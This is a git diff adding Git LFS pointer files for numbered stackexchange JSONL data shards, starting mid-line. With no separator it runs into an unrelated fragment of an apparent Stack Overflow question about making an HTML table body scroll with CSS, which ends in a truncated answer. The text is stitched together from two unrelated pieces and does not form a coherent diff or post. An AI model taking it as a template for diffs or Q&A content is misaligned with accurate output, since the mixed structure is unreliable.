/dev/null +++ b/data/stackexchange/1-1/989_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f19b5a5bf47dd6242d727b20eb7e9506f151bb6fecbfe50a0b0b19a47aef2218 +size 34509381 diff --git a/data/stackexchange/1-1/98_2289.jsonl b/data/stackexchange/1-1/98_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1d7251468e4094335ce84b0bcf03f079c18c7fb1 --- /dev/null +++ b/data/stackexchange/1-1/98_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c9789d19fcbc3960a5e7160ad2e74dffeec9ffa43861c08fd34e04074f7d75b +size 38836843 diff --git a/data/stackexchange/1-1/990_2289.jsonl b/data/stackexchange/1-1/990_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a5e9ef0d05f5b576cf67f08a1a88072a801e6d72 --- /dev/null +++ b/data/stackexchange/1-1/990_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:55951517c28827a3b8e70651a01123b506388d71f85e2d2b3ba2ad8d5df5999f +size 34657652 diff --git a/data/stackexchange/1-1/991_2289.jsonl b/data/stackexchange/1-1/991_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e696dcdfb6ec0df1dcd148b98ec9d90d5e657406 --- /dev/null +++ b/data/stackexchange/1-1/991_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6e626a7f38f15df88e6630380547ad47d86dac41539cc64103ca0d95af21eedc +size 34516000 diff --git a/data/stackexchange/1-1/992_2289.jsonl b/data/stackexchange/1-1/992_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..418918ae55c3a517987dba2300f79c17cdc32412 --- /dev/null +++ b/data/stackexchange/1-1/992_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5f80a338dab6b338b0b679104f34c6f6b46f505eb675c8b74f1737f9b3465ad6 +size 35126898 diff --git a/data/stackexchange/1-1/993_2289.jsonl b/data/stackexchange/1-1/993_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5a96ecf92e5db384c32c3f87113c854048e76de7 --- /dev/null +++ b/data/stackexchange/1-1/993_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d0e4a5d75e0fc6a4c03dcf4a2655e8e56b6ed8d09f68c6edc06b4614a1e44fe +size 34236814 diff --git a/data/stackexchange/1-1/994_2289.jsonl b/data/stackexchange/1-1/994_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..abee12b1be1a005a1b51944085b81ad43f35205e --- /dev/null +++ b/data/stackexchange/1-1/994_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e6a735d238823bbc670ff9dda76a977cfcc04480d7264270ffe973996c5b9dc0 +size 35315777 diff --git a/data/stackexchange/1-1/995_2289.jsonl b/data/stackexchange/1-1/995_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a764a5b8b2ac229abb31bc47ac6716cb6ce8137 --- /dev/null +++ b/data/stackexchange/1-1/995_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a2be41eac230aa9e4823eecfd3ccb73685890a76b4d4521d205a0abd7a196404 +size 34151208 diff --git a/data/stackexchange/1-1/996_2289.jsonl b/data/stackexchange/1-1/996_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..03af3a50b798a988dce2b932b55dccde69975018 --- /dev/null +++ b/data/stackexchange/1-1/996_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d90b42f2ebeaea851bdc58f7b553150d77c3ac13cc8d4abcdc97539cb74cfd79 +size 34892655 diff --git a/data/stackexchange/1-1/997_2289.jsonl b/data/stackexchange/1-1/997_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c2a98ca5c07defb1d5321f5f160e4a8cf65b2c26 --- /dev/null +++ b/data/stackexchange/1-1/997_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8c704bfa17b0234d091a57a756c5088e642a03a278cba6f363f7992562e48a9 +size 34876634 diff --git a/data/stackexchange/1-1/998_2289.jsonl b/data/stackexchange/1-1/998_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2bd66169ffb2e299f7e9c995c60a02322e0ec2cc --- /dev/null +++ b/data/stackexchange/1-1/998_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:56c74259fad71798186f1fd2faf85653a79f16c20f489a3861fdb1b27db373d4 +size 34677270 diff --git a/data/stackexchange/1-1/999_2289.jsonl b/data/stackexchange/1-1/999_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..14f777bc4b64a1b40b4d74932cc189735aafd442 --- /dev/null +++ b/data/stackexchange/1-1/999_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25b29e4698b99f03957c9d084bfa95dfbb31db084bd08b5cc72b9549dcf780e7 +size 34892752 diff --git a/data/stackexchange/1-1/99_2289.jsonl b/data/stackexchange/1-1/99_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8309abe8c5b65533d8988112ed9ee9d79f8b0853 --- /dev/null +++ b/data/stackexchange/1-1/99_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:453de4912e5558b5a6f3330afaf9ae8926a0fdb7c7b88a92e12578bbce3ebd04 +size 39769530 diff --git a/data/stackexchange/1-1/9_2289.jsonl b/data/stackexchange/1-1/9_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c70ea9607070dc81717f23be7b3b65f036b237e --- /dev/null +++ b/data/stackexchange/1-1/9_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93a5755edcaa912d8c177aae3361b7671e76e311b1e9193b91ad242950f353ff +size 35684040
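Each file added above is not the JSONL payload itself but a three-line Git LFS pointer: the spec version, a sha256 oid, and the byte size of the real object, which `git lfs pull` later materialises in place of the pointer. As a minimal sketch (the local paths are assumptions about a checked-out copy of this repo, not part of the change), a pulled shard could be verified against the oid and size recorded here:

import hashlib
import os

def parse_pointer(pointer_text: str) -> dict:
    """Split a Git LFS pointer ('version ...', 'oid sha256:<hex>', 'size <bytes>') into fields."""
    fields = {}
    for line in pointer_text.strip().splitlines():
        key, _, value = line.partition(" ")
        fields[key] = value
    return fields

def verify_shard(data_path: str, pointer_text: str) -> bool:
    """Return True if the pulled file matches the sha256 oid and byte size in its pointer."""
    fields = parse_pointer(pointer_text)
    expected_oid = fields["oid"].split(":", 1)[1]
    expected_size = int(fields["size"])
    if os.path.getsize(data_path) != expected_size:
        return False
    digest = hashlib.sha256()
    with open(data_path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest() == expected_oid

# Pointer text as added by this diff for data/stackexchange/1-1/9_2289.jsonl;
# the data path assumes `git lfs pull` has already replaced the pointer on disk.
pointer = (
    "version https://git-lfs.github.com/spec/v1\n"
    "oid sha256:93a5755edcaa912d8c177aae3361b7671e76e311b1e9193b91ad242950f353ff\n"
    "size 35684040\n"
)
print(verify_shard("data/stackexchange/1-1/9_2289.jsonl", pointer))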
<table class="scroll">
  <thead>
    <tr>
      <th>Name</th> <th>Web Address</th> <th>Office Location</th> <th>Configuration</th> <th>Status</th> <th>Queue</th> <th>Action</th>
    </tr>
  </thead>
  <tbody>
    <tr><td>Tester A</td> <td>bat-1.sj</td> <td>California</td> <td>Normal config.</td> <td>Online</td> <td>5 Jobs</td>  <td><a>Connect</a></td></tr>
    <tr><td>Tester B</td> <td>bat-1.sj</td> <td>California</td> <td>Normal config.</td> <td>Online</td> <td>9 Jobs</td>  <td><a>Connect</a></td></tr>
    <tr><td>Tester C</td> <td>bat-1.sj</td> <td>California</td> <td>Normal config.</td> <td>Online</td> <td>2 Jobs</td>  <td><a>Connect</a></td></tr>
    <tr><td>Tester D</td> <td>bat-1.sj</td> <td>California</td> <td>Normal config.</td> <td>Online</td> <td>4 Jobs</td>  <td><a>Connect</a></td></tr>
    <tr><td>Tester E</td> <td>bat-1.sj</td> <td>California</td> <td>Normal config.</td> <td>Online</td> <td>7 Jobs</td>  <td><a>Connect</a></td></tr>
    <tr><td>Tester F</td> <td>bat-1.sj</td> <td>California</td> <td>Normal config.</td> <td>Online</td> <td>5 Jobs</td>  <td><a>Connect</a></td></tr>
    <tr><td>Tester G</td> <td>bat-1.sj</td> <td>California</td> <td>Normal config.</td> <td>Online</td> <td>11 Jobs</td> <td><a>Connect</a></td></tr>
    <tr><td>Tester H</td> <td>bat-1.sj</td> <td>California</td> <td>Normal config.</td> <td>Online</td> <td>6 Jobs</td>  <td><a>Connect</a></td></tr>
    <tr><td>Tester I</td> <td>bat-1.sj</td> <td>California</td> <td>Normal config.</td> <td>Online</td> <td>3 Jobs</td>  <td><a>Connect</a></td></tr>
  </tbody>
</table>

CSS:

table.scroll {
    width: 100%;
    /* Optional */
    /* border-collapse: collapse; */
    border-spacing: 0;
    border: 2px solid black;
}
table.scroll tbody,
table.scroll thead {
    display: block;
}
thead tr th {
    height: 30px;
    line-height: 30px;
    /* text-align: left; */
}
table.scroll tbody {
    height: 100px;
    overflow-y: auto;
    overflow-x: hidden;
}
tbody {
    border-top: 2px solid black;
}
tbody td, thead th {
    width: auto;
    /* Optional */
    border-right: 1px solid black;
}
tbody td:last-child, thead th:last-child {
    border-right: none;
}

Here's my JSFiddle.

Comment: You cannot control the height of a table, so you cannot apply overflow: hidden to it. Applying display: block makes the browser accept a height, but you lose the regular table behaviour as well.
Comment: Hi there, welcome to Stack Overflow. Thank you for including some example code of your work. I recommend using the snippet option within the text editor to show your code.
Answer: It seems you want to fix your …
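The table, CSS, and comments above read like the body of a Stack Overflow post, which appears to be the kind of record these stackexchange shards hold as JSON-escaped text, one record per line. A minimal sketch of previewing one such line after `git lfs pull` — the shard path is taken from the diff, while the `text` field name is a guess at the schema, not something this change documents:

import json

shard_path = "data/stackexchange/1-1/999_2289.jsonl"  # any shard added by this change

with open(shard_path, "r", encoding="utf-8") as f:
    record = json.loads(f.readline())   # json.loads undoes the \/ and \n escaping seen in the raw data

body = record.get("text", "")           # "text" is an assumed field name; adjust to the real schema
print(body[:500])                       # preview the recovered markup of the post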